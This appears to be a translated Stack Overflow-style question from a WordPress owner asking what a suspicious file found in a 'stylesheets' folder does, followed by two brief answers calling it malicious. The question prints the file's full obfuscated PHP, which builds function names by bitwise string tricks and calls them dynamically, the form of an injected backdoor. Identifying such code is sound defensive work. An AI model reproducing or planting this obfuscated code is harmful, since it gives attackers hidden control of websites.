需要一些帮助来确定这个躲闪代码的作用?在WordPress安装上找到

时间:2015-02-20 07:15:52

标签: php wordpress bots

好的,我有一个WordPress网站。我在WordPress安装的根目录(域的根目录)中的一个名为: stylesheets 的文件夹中找到了一个名为: mod_latestnews.php 的文件。我强烈怀疑它可能是恶意的。只需要一些帮助来识别它,谢谢。

<?php
$Q_='sCXqZD1Bv'&~cIJ;$X6Bzl='E$e'|'^ i';$psqlbMHVJ3='T!2`>&'|'#'.dVetT;$gzWQoy='_?'.
'/~6kVp{fN%'&'^o~^</n7J&Ol';$AS_Si0='w{o~_}wm~_v}~'.o_grze.'}'&/*fGhnTtxKMf4Sw'.
'aGPs_Zqda*/"ok|o_}{m~_v}~".o_kr."~m}";$IL8D6p=HJMDhUH.'=(_OI@DJ@@'./*GjZ1O5Kz'.
'I5rSB${*/I2RVH6ABJH.'@'.BDOR|'@HQ@dI }0'.LZHB.'@'.h4DI.'"PFD('.TJzDHDDLv;'DKP'.
'Xr:';$HBOYG2nU6=GnwG&'[?wl';$zzH=jku&'!]N';$PXW0_MgmTi='#'&q;$Wfqi_lu='s>_}}o'.
'k_/;'&"Qg{=}_#~??";$i6b2C9KsM01='J@TQ]'.MIHQQhTFm.']'.KHQOHPNiE|YTRLKPVc.#slf'.
'^'.UfTGCBBY.'!'.FNUn.'"D';$qASK='@'.TdPU.':'.QUVICEMN.'[ThD.'.JOALt|'hv|@[J_@'.
'v`'.OTKCF7.'"'.EfOnLY6;$M07='BE5='|'b"<!';$BaL=A&a;$C66HKXW='6c?lew'^#x8Pa2N5'.
'~7k<:6';$A2ImaeJCMP=rr&yz;$bqKqY='a%Q@aP`ac`'|'eF^r%`L@a%';$o7=/*RNnrKVX0m7Ld'.
'R)@$6w*/"EB1( -Bp`G\$6"|' '.C1HdmD.'%dF`D';$zz5EOx='LW@lD)ljX'|DSRL.'$'./*fv6'.
'UAz$6)*/ehbB;$pch1SaJiI="Wy{".lmVysr."}v"&'_=zf}~{c:lw';$ID7bbiuBJ=$X6Bzl^(#w'.
'~iX'&'3Vz');$jw7=('omu}o~'&'o}~}o~')&$psqlbMHVJ3;$ygm_RozfP=$gzWQoy^(/*klrOVx'.
'-?@),*/ugtNCm.'@pft]?'^'[:?w(4c0@3p~');$kA=('{w}~'._wwor_owoc_.'}{su{'&#GBcIJ'.
'{}'.nm_w.'{'.gs_ouo.'{_s{s{{')&$AS_Si0;$zkrpwgj3Ls=$IL8D6p^('}/?&Z?^O]{j.'./*'.
'>%IefQLZ-*/swZce.'{wcp){3|ow/~{}['&'}?;ox~~NY;{'.zwwx_7.'/'.Wgjm.#yZuCXFdZ5vR'.
'[3|]}:~s}b');$s424CmhsRx=$HBOYG2nU6^(lOyk&'mOX%');$dwGdfGQrb1I=('>%Q'^ZLp)|/*'.
'.HsV*/$zzH;$X_j=$PXW0_MgmTi|$BaL;$qQgbhHxspb=(Hy0O.' '.bB7BH|",4 F ".pD5B./*K'.
'x_,|*Y*/"@")^$Wfqi_lu;$IVXoBNtp=$i6b2C9KsM01&$qASK;if($ID7bbiuBJ($jw7(/*_H1EE'.
'{u*/$C66HKXW))!=$zkrpwgj3Ls)$ygm_RozfP($s424CmhsRx,$dwGdfGQrb1I,$X_j);$kA(/*z'.
'4rAeZq33v?*/$A2ImaeJCMP.$bqKqY,array($qQgbhHxspb,$jw7($IVXoBNtp),$o7./*KByxGf'.
',|BJpU_{~*/$zz5EOx.$pch1SaJiI.$M07));#-_gFxEx%N1L$wWJw_Zry:p..(ZC_vSjJ@JH39n'.
'P{-1gib :7k=LYkAW?w4rHS_.fUuc_Q_tnjMS{{N[n_YN]f@d4';

2 个答案:

答案 0 :(得分:0)

是的,它看起来像是一个编写代码。尝试使用在线解码器解码它。也可以在完整的网站上搜索&#34; mod_latestnews&#34;,它可能会被其他文件调用。看看我对这个问题的回答。
Are my websites hacked?

答案 1 :(得分:0)

是的,它绝对是您网站上添加的恶意代码段,因为默认情况下WordPress在根目录中没有任何 样式表 文件夹。